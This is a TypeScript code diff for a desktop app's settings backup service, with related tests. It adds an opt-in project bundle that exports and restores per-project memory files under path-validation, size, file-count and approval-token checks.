-  relativePath: string,
-  options: { portable: boolean } = { portable: true }
-): void {
+function hasDisallowedPathShape(relativePath: string, options: { portable: boolean }): boolean {
   const segments = backupPathSegments(relativePath);
-  if (
-    !isAllowedPayloadPath(relativePath) ||
+  return (
     path.isAbsolute(relativePath) ||
     // Payload paths are always posix. A backslash is an ordinary filename character
     // here but a separator on Windows, so `skills/..\..\evil` would escape the
@@ -207,12 +233,25 @@ function assertAllowedPayloadPath(
     (options.portable && relativePath.includes("\\")) ||
     segments.some(
       (segment) =>
+        segment === "" ||
         segment === ".." ||
         isHiddenName(segment) ||
         (options.portable && isWindowsUnusableSegment(segment))
     ) ||
     isForbiddenBasename(path.posix.basename(relativePath))
-  ) {
+  );
+}
+
+/**
+ * Local safety snapshots use `portable: false` so cross-platform filename checks cannot block
+ * a restore while protecting a file valid on the current filesystem. Containment and allowlist
+ * checks still apply.
+ */
+function assertAllowedPayloadPath(
+  relativePath: string,
+  options: { portable: boolean } = { portable: true }
+): void {
+  if (!isAllowedPayloadPath(relativePath) || hasDisallowedPathShape(relativePath, options)) {
     throw new Error(`Backup contains disallowed path '${relativePath}'`);
   }
 }
@@ -694,12 +733,15 @@ async function isRegularFile(filePath: string): Promise<boolean> {
   return (await lstatOrNull(filePath))?.isFile() === true;
 }
 
-export async function collectAllowlistedFiles(muxRoot: string): Promise<BackupFile[]> {
-  const root = await resolveRoot(muxRoot);
+/**
+ * One collection pass with its own byte budget, hard-link tracker, and path-complexity
+ * tracker. The core payload and the project bundle collect through separate instances so a
+ * large bundle can never starve the core payload's budget, and vice versa.
+ */
+function createBackupFileCollector(root: BackupRoot) {
   const files: BackupFile[] = [];
   const budget = createByteBudget();
   const links = createHardLinkTracker();
-
   const pathComplexity = createBackupPathComplexityTracker();
 
   async function collectDirectory(
@@ -735,22 +777,38 @@ export async function collectAllowlistedFiles(muxRoot: string): Promise<BackupFi
     }
   }
 
-  for (const relativePath of ["AGENTS.md", "mcp.jsonc"]) {
-    if (await isRegularFile(path.join(root.path, relativePath))) {
+  async function collectNamedFile(relativePath: string): Promise<void> {
+    if (await isRegularFile(path.join(root.path, ...relativePath.split("/")))) {
       assertBackupFileCount(files.length + 1);
       pathComplexity.recordFile(relativePath);
       files.push(await readBackupFile(root, relativePath, budget, links));
     }
   }
 
-  await collectDirectory(
+  return {
+    files,
+    collectDirectory,
+    collectNamedFile,
+    assertHardLinksContained: () => links.assertContained(),
+  };
+}
+
+export async function collectAllowlistedFiles(muxRoot: string): Promise<BackupFile[]> {
+  const root = await resolveRoot(muxRoot);
+  const collector = createBackupFileCollector(root);
+
+  for (const relativePath of ["AGENTS.md", "mcp.jsonc"]) {
+    await collector.collectNamedFile(relativePath);
+  }
+
+  await collector.collectDirectory(
     "agents",
     (relativePath, entry) => entry.isDirectory() || /^agents\/[^/]+\.md$/.test(relativePath)
   );
-  await collectDirectory("skills", () => true);
-  await collectDirectory("memory/global", () => true);
-  links.assertContained();
-  return files.sort((a, b) => a.path.localeCompare(b.path));
+  await collector.collectDirectory("skills", () => true);
+  await collector.collectDirectory("memory/global", () => true);
+  collector.assertHardLinksContained();
+  return collector.files.sort((a, b) => a.path.localeCompare(b.path));
 }
 
 function copyJson<T>(value: T): T {
@@ -1323,7 +1381,13 @@ function mcpConfigRequiresPublishApproval(content: string): boolean {
 }
 
 function isRecursivelyCollected(filePath: string): boolean {
-  return filePath.startsWith("skills/") || filePath.startsWith("memory/global/");
+  return (
+    filePath.startsWith("skills/") ||
+    filePath.startsWith("memory/global/") ||
+    // Project-bundle memory files are scanned alongside the core payload with their
+    // bundle-relative paths, and are swept up recursively the same way global memory is.
+    filePath.startsWith(PROJECT_MEMORY_PATH_PREFIX)
+  );
 }
 
 /**
@@ -2510,4 +2574,375 @@ export async function restoreBackupPayload(
   }
 
   return { backupPreferences: plan.backupPreferences, localOnlyFiles: localOnly };
+}
+
+// ---------------------------------------------------------------------------
+// Project bundle: the opt-in `project-bundle/` sidecar carrying the project
+// list and per-project memories. Kept out of the core manifest for downgrade
+// safety (see PROJECT_BUNDLE_DIR); every function here validates with its own
+// bundle-scoped allowlist and byte budget so a bundle can neither smuggle a
+// path past the core allowlist nor starve a core-only read.
+// ---------------------------------------------------------------------------
+
+export interface BackupProjectBundle {
+  manifest: BackupProjectBundleManifest;
+  files: BackupFile[];
+}
+
+/** Bundle files live only under `memory/project/<dir>/...`, so at least four segments. */
+function assertAllowedBundleFilePath(
+  relativePath: string,
+  options: { portable: boolean } = { portable: true }
+): void {
+  if (
+    !relativePath.startsWith(PROJECT_MEMORY_PATH_PREFIX) ||
+    relativePath.split("/").length < 4 ||
+    hasDisallowedPathShape(relativePath, options)
+  ) {
+    throw new Error(`Backup project bundle contains disallowed path '${relativePath}'`);
+  }
+}
+
+/**
+ * A recorded memory directory name is repository-controlled, so it is held to the safe
+ * charset `projectMemoryDirName` emits and its hash suffix must match the entry's own
+ * project path. Deliberately NOT full `projectMemoryDirName(entry.path)` equality: the
+ * sanitized basename half is derived from the source machine's path syntax, so a Windows
+ * export legitimately disagrees with a POSIX recomputation, while the pure string hash is
+ * host-independent. Restore destinations are always recomputed locally either way.
+ */
+function assertValidBundleEntryDir(entry: BackupProjectBundleEntry): void {
+  const { memoryDir } = entry;
+  if (
+    !/^[A-Za-z0-9._-]{1,64}$/.test(memoryDir) ||
+    isHiddenName(memoryDir) ||
+    isForbiddenBasename(memoryDir) ||
+    isWindowsUnusableSegment(memoryDir) ||
+    !memoryDir.endsWith(`-${projectPathHashSuffix(entry.path)}`) ||
+    !/[0-9a-f]{12}$/.test(memoryDir)
+  ) {
+    throw new Error(
+      `Backup project bundle entry '${entry.path}' has an invalid memory directory name`
+    );
+  }
+}
+
+/** The collision-folded memory directory segment of a bundle file path. */
+function bundleFileDirKey(relativePath: string): string {
+  return collisionKey(relativePath.split("/")[2] ?? "");
+}
+
+export function bundleEntryFiles(
+  files: readonly BackupFile[],
+  entry: BackupProjectBundleEntry
+): BackupFile[] {
+  const dirKey = collisionKey(entry.memoryDir);
+  return files.filter((file) => bundleFileDirKey(file.path) === dirKey);
+}
+
+/**
+ * Collects the memory directories of the given project entries from the local Xum root.
+ * Per entry rather than a blind `memory/project` sweep, so orphaned directories of deleted
+ * projects stay local. Entries must already carry their locally computed memory dir names.
+ */
+export async function collectProjectBundle(
+  muxRoot: string,
+  entries: readonly BackupProjectBundleEntry[]
+): Promise<BackupProjectBundle> {
+  if (entries.length > MAX_BACKUP_PROJECT_ENTRIES) {
+    throw new Error(`Backup has more than ${MAX_BACKUP_PROJECT_ENTRIES} projects`);
+  }
+  const seenPaths = new Set<string>();
+  const seenDirs = new Set<string>();
+  for (const entry of entries) {
+    // Local entries come from projectMemoryDirName, so these are impossible-condition
+    // checks on the export side; the same validation guards the read side for real.
+    assertValidBundleEntryDir(entry);
+    if (seenPaths.has(entry.path)) {
+      throw new Error(`Backup project bundle lists '${entry.path}' twice`);
+    }
+    seenPaths.add(entry.path);
+    const dirKey = collisionKey(entry.memoryDir);
+    if (seenDirs.has(dirKey)) {
+      throw new Error(`Backup project bundle reuses memory directory '${entry.memoryDir}'`);
+    }
+    seenDirs.add(dirKey);
+  }
+
+  const root = await resolveRoot(muxRoot);
+  const collector = createBackupFileCollector(root);
+  const sorted = [...entries].sort((a, b) => a.path.localeCompare(b.path));
+  for (const entry of sorted) {
+    await collector.collectDirectory(`${PROJECT_MEMORY_PATH_PREFIX}${entry.memoryDir}`, () => true);
+  }
+  collector.assertHardLinksContained();
+  // The executable bit is dropped on purpose: memory files are notes, and the bundle
+  // manifest does not record modes, so restores always land them non-executable.
+  const files = collector.files
+    .map((file) => ({ path: file.path, content: file.content }))
+    .sort((a, b) => a.path.localeCompare(b.path));
+  return {
+    manifest: {
+      schemaVersion: 1,
+      projects: sorted.map((entry) => ({
+        path: entry.path,
+        name: entry.name,
+        ...(entry.gitRemote !== undefined ? { gitRemote: entry.gitRemote } : {}),
+        memoryDir: entry.memoryDir,
+      })),
+      files: files.map((file) => ({ path: file.path, sha256: sha256(file.content) })),
+    },
+    files,
+  };
+}
+
+/**
+ * Writes the bundle into its sidecar directory. No manifest-reuse dance like the core
+ * writer needs: the bundle manifest has no volatile metadata, and its arrays are sorted,
+ * so identical content serializes to identical bytes and never forces a no-op commit.
+ */
+export async function writeProjectBundle(
+  destinationDir: string,
+  bundle: BackupProjectBundle,
+  options: { portable?: boolean; ownerOnly?: boolean } = {}
+): Promise<void> {
+  const portable = options.portable !== false;
+  const ownerOnly = options.ownerOnly === true;
+  assertBackupFileCount(bundle.files.length);
+  assertBackupPathComplexity(bundle.files.map((file) => file.path));
+  for (const file of bundle.files) assertAllowedBundleFilePath(file.path, { portable });
+  for (const file of bundle.manifest.files) assertAllowedBundleFilePath(file.path, { portable });
+  const claimed = new Set<string>();
+  for (const file of bundle.files) {
+    const claim = portable ? collisionKey(file.path) : file.path;
+    if (claimed.has(claim)) throw new Error(`Duplicate backup path '${file.path}'`);
+    claimed.add(claim);
+  }
+  const manifestJson = `${JSON.stringify(bundle.manifest, null, 2)}\n`;
+  // Bound what is published so a bundle that writes is never one every later read rejects.
+  const budget = createByteBudget();
+  budget(BACKUP_MANIFEST_FILE, Buffer.byteLength(manifestJson, "utf-8"));
+  for (const file of bundle.files) budget(file.path, file.content.length);
+
+  await fs.rm(destinationDir, { recursive: true, force: true });
+  await fs.mkdir(destinationDir, { recursive: true, ...(ownerOnly ? { mode: 0o700 } : {}) });
+  const root = await resolveRoot(destinationDir);
+  for (const file of bundle.files) {
+    await resolveContainedPath(root.path, file.path);
+    await writeCheckedFile(root, file.path, file.content, false, { ownerOnly });
+  }
+  await writeCheckedFile(root, BACKUP_MANIFEST_FILE, Buffer.from(manifestJson, "utf-8"), false, {
+    ownerOnly,
+  });
+}
+
+/**
+ * Existence is checked without parsing, so a malformed sidecar can be reported as present
+ * while `includeProjects` is off without ever blocking a core-only restore on its contents.
+ */
+export async function projectBundleExists(sourceDir: string): Promise<boolean> {
+  return await fileExists(path.join(sourceDir, PROJECT_BUNDLE_DIR, BACKUP_MANIFEST_FILE));
+}
+
+function parseProjectBundleManifest(raw: string): BackupProjectBundleManifest {
+  const tree = jsonc.parseTree(raw);
+  if (!tree) throw new Error("Invalid backup project bundle manifest");
+  assertNoDuplicateKeys(tree, "backup project bundle manifest");
+  const parsed = BackupProjectBundleManifestSchema.safeParse(JSON.parse(raw));
+  if (!parsed.success) throw new Error("Invalid backup project bundle manifest");
+  return {
+    ...parsed.data,
+    // Remotes are display-only hints; a shape the sanitizer refuses is dropped rather
+    // than failing the whole bundle, and the import token binds the normalized entry.
+    projects: parsed.data.projects.map((entry) => {
+      const gitRemote =
+        entry.gitRemote === undefined ? undefined : sanitizeBackupGitRemote(entry.gitRemote);
+      return {
+        path: entry.path,
+        name: entry.name,
+        ...(gitRemote !== undefined ? { gitRemote } : {}),
+        memoryDir: entry.memoryDir,
+      };
+    }),
+  };
+}
+
+/**
+ * Reads and fully validates the sidecar, or returns null when the backup carries none.
+ * Callers gate this on `includeProjects`: with the toggle off the sidecar is never parsed,
+ * so a malformed bundle cannot block a core-only restore.
+ */
+export async function readProjectBundle(
+  sourceDir: string,
+  options: { portable?: boolean } = {}
+): Promise<BackupProjectBundle | null> {
+  if (!(await projectBundleExists(sourceDir))) return null;
+  try {
+    return await readProjectBundleUnchecked(sourceDir, options.portable !== false);
+  } catch (error) {
+    if (isFilesystemError(error)) throw error;
+    throw new BackupInvalidPayloadError(error);
+  }
+}
+
+async function readProjectBundleUnchecked(
+  sourceDir: string,
+  portable: boolean
+): Promise<BackupProjectBundle> {
+  // Contained resolution first: a symlinked `project-bundle` in a crafted repository must
+  // be refused before resolveRoot would canonicalize straight through it.
+  const bundleDir = await resolveContainedPath(sourceDir, PROJECT_BUNDLE_DIR);
+  const budget = createByteBudget();
+  const root = await resolveRoot(bundleDir);
+  await resolveContainedPath(root.path, BACKUP_MANIFEST_FILE);
+  const manifestRaw = await readCheckedFile(root, BACKUP_MANIFEST_FILE, (size) => {
+    budget(BACKUP_MANIFEST_FILE, size);
+  });
+  const manifest = parseProjectBundleManifest(manifestRaw.content.toString("utf-8"));
+
+  const entryDirKeys = new Set<string>();
+  const entryPaths = new Set<string>();
+  for (const entry of manifest.projects) {
+    assertValidBundleEntryDir(entry);
+    if (entryPaths.has(entry.path)) {
+      throw new Error(`Backup project bundle lists '${entry.path}' twice`);
+    }
+    entryPaths.add(entry.path);
+    const dirKey = collisionKey(entry.memoryDir);
+    if (entryDirKeys.has(dirKey)) {
+      throw new Error(`Backup project bundle reuses memory directory '${entry.memoryDir}'`);
+    }
+    entryDirKeys.add(dirKey);
+  }
+
+  assertBackupFileCount(manifest.files.length);
+  assertBackupPathComplexity(manifest.files.map((file) => file.path));
+  const files: BackupFile[] = [];
+  const seen = new Set<string>();
+  for (const manifestFile of manifest.files) {
+    assertAllowedBundleFilePath(manifestFile.path, { portable });
+    if (!entryDirKeys.has(bundleFileDirKey(manifestFile.path))) {
+      throw new Error(
+        `Backup project bundle file '${manifestFile.path}' does not belong to a listed project`
+      );
+    }
+    const key = portable ? collisionKey(manifestFile.path) : manifestFile.path;
+    if (seen.has(key)) throw new Error(`Duplicate backup path '${manifestFile.path}'`);
+    seen.add(key);
+    const content = await readManifestEntry(root, manifestFile.path, budget);
+    if (sha256(content) !== manifestFile.sha256) {
+      throw new Error(`Backup checksum mismatch for '${manifestFile.path}'`);
+    }
+    files.push({ path: manifestFile.path, content });
+  }
+  return { manifest, files };
+}
+
+/**
+ * Binds an import approval to the exact entry and content it was shown for. JSON with a
+ * fixed key order, so no delimiter ambiguity; any change to the entry's metadata or to one
+ * of its memory files between preview and restore produces a different token and forces
+ * re-approval.
+ */
+export function projectImportToken(
+  entry: BackupProjectBundleEntry,
+  files: readonly BackupFile[]
+): string {
+  const contentHashes = bundleEntryFiles(files, entry)
+    .map((file) => [file.path, sha256(file.content)] as const)
+    .sort(([a], [b]) => (a < b ? -1 : a > b ? 1 : 0));
+  return sha256(
+    Buffer.from(
+      JSON.stringify([
+        1,
+        {
+          path: entry.path,
+          name: entry.name,
+          gitRemote: entry.gitRemote ?? null,
+          memoryDir: entry.memoryDir,
+        },
+        contentHashes,
+      ]),
+      "utf-8"
+    )
+  );
+}
+
+export interface ProjectBundleRestorePlan {
+  /** Entries registered here at exactly their recorded path and dir name: restored verbatim. */
+  matched: Array<{ entry: BackupProjectBundleEntry; files: BackupFile[] }>;
+  /** Everything else: never written without an explicit per-entry import approval. */
+  imports: Array<{ entry: BackupProjectBundleEntry; files: BackupFile[]; token: string }>;
+}
+
+/**
+ * Partitions bundle entries against the projects registered on this machine. The caller
+ * supplies `registeredDirByPath` as project path → locally computed memory dir name, so a
+ * match asserts both "registered at exactly this path" and "the recorded dir name is the
+ * one this host computes" — a foreign-OS source path with a correct hash suffix falls
+ * through to an import candidate rather than being rejected or silently written.
+ */
+export function planProjectBundleRestore(
+  bundle: BackupProjectBundle,
+  registeredDirByPath: ReadonlyMap<string, string>
+): ProjectBundleRestorePlan {
+  const plan: ProjectBundleRestorePlan = { matched: [], imports: [] };
+  for (const entry of bundle.manifest.projects) {
+    const files = bundleEntryFiles(bundle.files, entry);
+    if (registeredDirByPath.get(entry.path) === entry.memoryDir) {
+      plan.matched.push({ entry, files });
+    } else {
+      plan.imports.push({ entry, files, token: projectImportToken(entry, bundle.files) });
+    }
+  }
+  return plan;
+}
+
+/** `memory/project/<recorded>/rest` re-keyed to the locally computed target directory. */
+export function rekeyProjectMemoryPath(bundlePath: string, targetDirName: string): string {
+  const segments = bundlePath.split("/");
+  return [segments[0], segments[1], targetDirName, ...segments.slice(3)].join("/");
+}
+
+/**
+ * Writes project memory files into the local Xum root. `addOnly: true` is the import mode:
+ * an identical existing file is fine, a differing one is skipped and reported as a conflict
+ * rather than overwritten unpreviewed. `addOnly: false` is the matched-restore mode, where
+ * overwriting is exactly what the previewed plan promised. Identical files are never
+ * rewritten in either mode, so `written` doubles as the changed-files report.
+ *
+ * Callers own the memory mutation lock: this function must run inside
+ * `withTargetMutationLock` on the memory root so backup never becomes an uncoordinated
+ * memory writer, and the conflict checks here are the required re-check under that lock.
+ */
+export async function writeProjectMemoryFiles(
+  muxRoot: string,
+  writes: ReadonlyArray<{ path: string; content: Buffer }>,
+  options: { addOnly: boolean }
+): Promise<{ written: string[]; skipped: string[] }> {
+  for (const write of writes) assertAllowedBundleFilePath(write.path);
+  const root = await resolveRoot(muxRoot);
+  const written: string[] = [];
+  const skipped: string[] = [];
+  // Charged so a marker-thin bundle cannot expand past the same bound reads enforce.
+  const budget = createByteBudget();
+  for (const write of writes) {
+    budget(write.path, write.content.length);
+    const destination = await resolveContainedPath(root.path, write.path);
+    const existing = await lstatOrNull(destination);
+    if (existing !== null && !existing.isFile()) {
+      throw new Error(`Cannot restore '${write.path}': a non-file already exists there`);
+    }
+    if (existing !== null) {
+      const current = await readCheckedFile(root, write.path, () => undefined);
+      if (current.content.equals(write.content)) continue;
+      if (options.addOnly) {
+        skipped.push(write.path);
+        continue;
+      }
+    }
+    await writeCheckedFile(root, write.path, write.content, false);
+    written.push(write.path);
+  }
+  return { written, skipped };
 }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -19,6 +19,7 @@ import {
   type BackupProjectBundleManifest,
 } from "@/common/config/schemas/settingsBackup";
 import { projectPathHashSuffix } from "@/node/services/memoryService";
+import { MEMORY_MAX_FILE_BYTES, MEMORY_MAX_FILES_PER_SCOPE } from "@/common/constants/memory";
 import { isPlainObject } from "@/common/utils/isPlainObject";
 import { isErrnoWithCode } from "@/node/utils/fs";
 import type { BackupCommandApproval, BackupProjectImport } from "@/common/orpc/schemas/backup";
@@ -2647,7 +2648,8 @@ export function bundleEntryFiles(
  */
 export async function collectProjectBundle(
   muxRoot: string,
-  entries: readonly BackupProjectBundleEntry[]
+  entries: readonly BackupProjectBundleEntry[],
+  options: { skipOversizedMemoryFiles?: boolean } = {}
 ): Promise<BackupProjectBundle> {
   if (entries.length > MAX_BACKUP_PROJECT_ENTRIES) {
     throw new Error(`Backup has more than ${MAX_BACKUP_PROJECT_ENTRIES} projects`);
@@ -2679,6 +2681,13 @@ export async function collectProjectBundle(
   // The executable bit is dropped on purpose: memory files are notes, and the bundle
   // manifest does not record modes, so restores always land them non-executable.
   const files = collector.files
+    // Exports skip files the memory subsystem itself refuses to read: bundling them would
+    // produce a backup this build's own restore rejects. Snapshots keep full fidelity so
+    // an overwritten oversized local file stays recoverable.
+    .filter(
+      (file) =>
+        options.skipOversizedMemoryFiles !== true || file.content.length <= MEMORY_MAX_FILE_BYTES
+    )
     .map((file) => ({ path: file.path, content: file.content }))
     .sort((a, b) => a.path.localeCompare(b.path));
   return {
@@ -2904,6 +2913,42 @@ export function rekeyProjectMemoryPath(bundlePath: string, targetDirName: string
   return [segments[0], segments[1], targetDirName, ...segments.slice(3)].join("/");
 }
 
+/** `memory/project/<dir>/rest` → `rest`, the path a project-scope memory store uses. */
+export function projectMemoryRelPath(bundlePath: string): string {
+  return bundlePath.split("/").slice(3).join("/");
+}
+
+/**
+ * Carries the files a failed project-memory write had already created: the writes are
+ * sequential without rollback, so the caller's failure report must include the partial
+ * progress as the user's cleanup list instead of claiming nothing was written.
+ */
+export class ProjectMemoryWriteError extends Error {
+  readonly written: string[];
+  readonly skipped: string[];
+
+  constructor(
+    message: string,
+    progress: { written: string[]; skipped: string[] },
+    options?: { cause?: unknown }
+  ) {
+    super(message, options);
+    this.name = "ProjectMemoryWriteError";
+    this.written = progress.written;
+    this.skipped = progress.skipped;
+  }
+}
+
+/** Regular files under a directory, for the per-scope memory file-count cap. */
+async function countFilesUnder(dirAbs: string): Promise<number> {
+  // Recursive readdir does not follow directory symlinks, and a missing scope directory
+  // counts as empty rather than failing the restore.
+  const entries = await fs
+    .readdir(dirAbs, { withFileTypes: true, recursive: true })
+    .catch(() => []);
+  return entries.filter((entry) => entry.isFile()).length;
+}
+
 /**
  * Writes project memory files into the local Xum root. `addOnly: true` is the import mode:
  * an identical existing file is fine, a differing one is skipped and reported as a conflict
@@ -2920,29 +2965,70 @@ export async function writeProjectMemoryFiles(
   writes: ReadonlyArray<{ path: string; content: Buffer }>,
   options: { addOnly: boolean }
 ): Promise<{ written: string[]; skipped: string[] }> {
-  for (const write of writes) assertAllowedBundleFilePath(write.path);
   const root = await resolveRoot(muxRoot);
-  const written: string[] = [];
-  const skipped: string[] = [];
   // Charged so a marker-thin bundle cannot expand past the same bound reads enforce.
   const budget = createByteBudget();
+  // Everything refusable is refused before the first write, so a rejected bundle
+  // changes nothing on disk.
+  const planned: Array<{ path: string; content: Buffer; exists: boolean }> = [];
   for (const write of writes) {
+    assertAllowedBundleFilePath(write.path);
+    // The memory subsystem's own read limit: a restored file larger than this would be
+    // persisted but permanently unreadable through memory commands, so it is refused
+    // here rather than written as unusable state.
+    if (write.content.length > MEMORY_MAX_FILE_BYTES) {
+      throw new Error(
+        `Cannot restore '${write.path}': larger than the ${MEMORY_MAX_FILE_BYTES}-byte memory file limit`
+      );
+    }
     budget(write.path, write.content.length);
     const destination = await resolveContainedPath(root.path, write.path);
     const existing = await lstatOrNull(destination);
     if (existing !== null && !existing.isFile()) {
       throw new Error(`Cannot restore '${write.path}': a non-file already exists there`);
     }
-    if (existing !== null) {
-      const current = await readCheckedFile(root, write.path, () => undefined);
-      if (current.content.equals(write.content)) continue;
-      if (options.addOnly) {
-        skipped.push(write.path);
-        continue;
-      }
+    planned.push({ path: write.path, content: write.content, exists: existing !== null });
+  }
+  // Per-scope file-count cap, mirrored from MemoryService. Only growth past the limit is
+  // refused: a store that already exceeds it (hand-placed files) can still be restored
+  // in place as long as this restore does not add to the overflow.
+  const addsByDir = new Map<string, number>();
+  for (const write of planned) {
+    if (write.exists) continue;
+    const scopeDir = write.path.split("/").slice(0, 3).join("/");
+    addsByDir.set(scopeDir, (addsByDir.get(scopeDir) ?? 0) + 1);
+  }
+  for (const [scopeDir, adds] of addsByDir) {
+    const existingCount = await countFilesUnder(path.join(root.path, scopeDir));
+    if (existingCount + adds > MEMORY_MAX_FILES_PER_SCOPE && adds > 0) {
+      throw new Error(
+        `Cannot restore '${scopeDir}': it would exceed the ${MEMORY_MAX_FILES_PER_SCOPE}-file memory limit`
+      );
     }
-    await writeCheckedFile(root, write.path, write.content, false);
-    written.push(write.path);
+  }
+  const written: string[] = [];
+  const skipped: string[] = [];
+  try {
+    for (const write of planned) {
+      if (write.exists) {
+        const current = await readCheckedFile(root, write.path, () => undefined);
+        if (current.content.equals(write.content)) continue;
+        if (options.addOnly) {
+          skipped.push(write.path);
+          continue;
+        }
+      }
+      await writeCheckedFile(root, write.path, write.content, false);
+      written.push(write.path);
+    }
+  } catch (error) {
+    // Sequential writes without rollback: report what already landed so the caller's
+    // failure result can double as the cleanup list.
+    throw new ProjectMemoryWriteError(
+      error instanceof Error ? error.message : String(error),
+      { written, skipped },
+      { cause: error }
+    );
   }
   return { written, skipped };
 }

--- a/src/node/services/memoryService.ts
+++ b/src/node/services/memoryService.ts
@@ -299,6 +299,16 @@ export function parseMemoryPath(virtualPath: string): ParsedMemoryPath {
 }
 
 /**
+ * The uniqueness suffix of a project memory directory name. A pure string hash of the
+ * project path, so it is host-independent: the settings backup's project bundle validates
+ * recorded memory directory names against this same function, which must therefore never
+ * incorporate anything filesystem- or platform-specific.
+ */
+export function projectPathHashSuffix(projectPath: string): string {
+  return createHash("sha256").update(projectPath).digest("hex").slice(0, 12);
+}
+
+/**
  * Filesystem-safe directory name for a project's host-local memory root
  * (<xumHome>/memory/project/<dirName>). The sanitized basename keeps the dir
  * human-recognizable; the path hash guarantees uniqueness across same-named
@@ -306,7 +316,7 @@ export function parseMemoryPath(virtualPath: string): ParsedMemoryPath {
  */
 export function projectMemoryDirName(projectPath: string): string {
   assert(projectPath !== "", "projectMemoryDirName requires a project identity");
-  const hash = createHash("sha256").update(projectPath).digest("hex").slice(0, 12);
+  const hash = projectPathHashSuffix(projectPath);
   // getProjectName falls back to "unknown" and sanitization maps (never
   // drops) disallowed chars, so base is always non-empty.
   const base = PlatformPaths.getProjectName(projectPath)
@@ -667,7 +677,9 @@ export class MemoryService extends EventEmitter {
         }
         // Host-local private notes about the project: keyed by stable project
         // identity (never the per-workspace checkout), so they survive
-        // re-checkouts and never appear in the repo.
+        // re-checkouts and never appear in the repo. The settings backup may
+        // carry this directory, but only when the user opts into its project
+        // bundle (see src/node/services/backup/payload.ts).
         return new LocalMemoryStore(
           path.join(this.config.rootDir, "memory", "project", projectMemoryDirName(ctx.projectPath))
         );

--- a/src/node/services/memoryService.ts
+++ b/src/node/services/memoryService.ts
@@ -900,6 +900,28 @@ export class MemoryService extends EventEmitter {
     this.emit("change", event);
   }
 
+  /**
+   * Announces project-scope files mutated outside this service. The settings-backup
+   * restore writes memory files directly (under the shared memory mutation lock), and
+   * subscribers only refresh from disk on change events, so without this an open memory
+   * browser keeps showing pre-restore contents. `relPaths` are scope-relative, as a
+   * project store sees them.
+   */
+  notifyExternalProjectChange(projectPath: string, relPaths: readonly string[]): void {
+    for (const relPath of relPaths) {
+      const event: MemoryChangeEvent = {
+        scope: "project",
+        path: toVirtualPath("project", relPath),
+        actor: "user",
+        // No originating workspace; the change filter only consults workspaceId for
+        // workspace-scope events.
+        workspaceId: "",
+        projectPath,
+      };
+      this.emit("change", event);
+    }
+  }
+
   // -------------------------------------------------------------------------
   // Commands
   // -------------------------------------------------------------------------

--- a/src/node/services/memoryService.ts
+++ b/src/node/services/memoryService.ts
@@ -901,25 +901,24 @@ export class MemoryService extends EventEmitter {
   }
 
   /**
-   * Announces project-scope files mutated outside this service. The settings-backup
+   * Announces that a project's memory was mutated outside this service. The settings-backup
    * restore writes memory files directly (under the shared memory mutation lock), and
    * subscribers only refresh from disk on change events, so without this an open memory
-   * browser keeps showing pre-restore contents. `relPaths` are scope-relative, as a
-   * project store sees them.
+   * browser keeps showing pre-restore contents. One event per project, addressed to the
+   * scope root: subscribers refetch the whole scope per event, so per-file events for a
+   * bulk restore would only multiply identical refreshes.
    */
-  notifyExternalProjectChange(projectPath: string, relPaths: readonly string[]): void {
-    for (const relPath of relPaths) {
-      const event: MemoryChangeEvent = {
-        scope: "project",
-        path: toVirtualPath("project", relPath),
-        actor: "user",
-        // No originating workspace; the change filter only consults workspaceId for
-        // workspace-scope events.
-        workspaceId: "",
-        projectPath,
-      };
-      this.emit("change", event);
-    }
+  notifyExternalProjectChange(projectPath: string): void {
+    const event: MemoryChangeEvent = {
+      scope: "project",
+      path: toVirtualPath("project", ""),
+      actor: "user",
+      // No originating workspace; the change filter only consults workspaceId for
+      // workspace-scope events.
+      workspaceId: "",
+      projectPath,
+    };
+    this.emit("change", event);
   }
 
   // -------------------------------------------------------------------------

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -2741,6 +2741,42 @@ exit 1
       expect(config.loadConfigOrDefault().projects.has(projectPath)).toBe(false);
     });
 
+    it("lets a backup import register and write inside one registration window", async () => {
+      const existing = "/fake/existing";
+      const target = path.join(tempDir, "imported");
+      await fs.mkdir(target);
+      const cfg = config.loadConfigOrDefault();
+      cfg.projects.set(existing, { workspaces: [] });
+      await config.editConfig(() => cfg);
+
+      const inside = Promise.withResolvers<void>();
+      const proceed = Promise.withResolvers<void>();
+      let removed = false;
+      const window = service.withRegistrationLock(async ({ create }) => {
+        // create() registers within the window rather than deadlocking on its own lock.
+        const created = await create(target);
+        expect(created.success).toBe(true);
+        inside.resolve();
+        await proceed.promise;
+        // A removal requested meanwhile has not landed: the registry is stable until the
+        // window closes, so an import writing memory here cannot lose its project.
+        expect(removed).toBe(false);
+        expect(config.loadConfigOrDefault().projects.has(existing)).toBe(true);
+      });
+      await inside.promise;
+      const removing = service.remove(existing).then((result) => {
+        removed = true;
+        return result;
+      });
+      await new Promise((resolve) => setTimeout(resolve, 100));
+      proceed.resolve();
+      await window;
+
+      expect((await removing).success).toBe(true);
+      expect(config.loadConfigOrDefault().projects.has(existing)).toBe(false);
+      expect(config.loadConfigOrDefault().projects.has(target)).toBe(true);
+    });
+
     it("forgets retained trust for cascade-removed sub-projects", async () => {
       const parentPath = "/fake/parent";
       const childPath = "/fake/parent/packages/api";

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -2886,6 +2886,54 @@ exit 1
       expect(config.loadConfigOrDefault().projects.has(target)).toBe(false);
     });
 
+    it("covers an edit that leaves the project set alone against another process's write", async () => {
+      // Every edit persists the whole config from the bytes it read, so a registration made
+      // by another process between this edit's read and its write would be dropped unless
+      // the edit, too, runs under the cross-process lock.
+      const otherProcess = await acquireProcessFileLock({
+        lockPath: projectRegistrationLockFilePath(tempDir),
+        timeoutMs: 5_000,
+        label: "test holder",
+      });
+      let saved = false;
+      const saving = config
+        .editConfig((cfg) => ({ ...cfg, llmDebugLogs: true }))
+        .then(() => {
+          saved = true;
+        });
+      await new Promise((resolve) => setTimeout(resolve, 150));
+      expect(saved).toBe(false);
+
+      const otherConfig = new Config(tempDir);
+      await otherConfig.editConfig(
+        (cfg) => {
+          cfg.projects.set("/fake/registered-meanwhile", { workspaces: [] });
+          return cfg;
+        },
+        { withinRegistrationLock: otherProcess }
+      );
+      await otherProcess[Symbol.asyncDispose]();
+      await saving;
+
+      const after = config.loadConfigOrDefault();
+      expect(after.llmDebugLogs).toBe(true);
+      expect(after.projects.has("/fake/registered-meanwhile")).toBe(true);
+    });
+
+    it("returns an Err when the registration lock cannot be taken", async () => {
+      const target = path.join(tempDir, "locked-out");
+      await fs.mkdir(target);
+      // The lock directory is a file, so the cross-process leg cannot be created.
